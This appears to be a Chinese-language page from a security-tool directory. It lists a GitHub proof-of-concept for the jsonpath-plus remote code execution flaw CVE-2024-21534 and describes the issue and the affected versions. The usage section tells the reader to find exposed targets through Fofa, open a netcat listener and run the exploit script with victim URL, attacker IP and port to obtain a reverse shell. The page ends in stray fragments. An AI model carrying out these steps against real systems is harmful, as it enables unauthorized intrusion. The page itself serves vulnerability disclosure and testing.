Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-21534 — POC - CVE-2024-21534 Jsonpath-plus 因输入清理不当而存在远程代码执行(RCE)漏洞 | Kitploit
工具/GitHubGitHub/verylazytech/cve-2024-21534
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用学习与教育远程访问工具
GitHubverylazytech/cve-2024-21534

cve-2024-21534

POC - CVE-2024-21534 Jsonpath-plus 因输入清理不当而存在远程代码执行(RCE)漏洞

查看仓库
51401年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

POC - CVE-2024-21534 Jsonpath-plus 因输入清理不当而容易受到远程代码执行(RCE)攻击

My Shop Medium Github Buy Me A Coffee

概述

CVE-2024-21534 是 jsonpath-plus 包 10.0.0 之前版本中的一个严重漏洞。该漏洞源于不当的输入清理,可能导致受影响系统上的远程代码执行(RCE)。此漏洞尤其危险,因为它可以在无需认证的情况下被利用,攻击者可通过发送特制输入在服务器上执行任意代码。该问题源于 Node.js vm 模块的不安全默认用法,一旦被利用,可能会危及整个系统。

受影响版本

jsonpath-plus 版本低于 10.2.0

受影响组件

该漏洞位于 jsonpath-plus 包中,该包广泛用于在应用程序中查询 JSON 数据结构。该缺陷源于不当的输入清理,允许恶意代码执行。

了解详情 — CVE-2024-21534

免责声明:此概念验证(POC)仅用于教育和道德测试目的。在未事先获得双方同意的情况下,使用此工具攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,也不对因使用本程序造成的任何误用或损害负责。

开始使用

寻找目标

要查找潜在目标,请使用 Fofa(类似于 Shodan.io):

  • Fofa 搜索语法:Jsonpath-plus

Fofa

克隆仓库

首先,克隆仓库:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-21534

现在使用 nc 打开一个监听器:

root@kitploit:~
nc -lnvp 443

运行漏洞利用代码:

对于 Linux / MacOs:

确保 URL 指向一个通过存在漏洞的 jsonpath-plus 包处理用户输入的端点,这样才能利用 RCE 漏洞。

root@kitploit:~
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

secoand

列出某些目录:

last

下载工具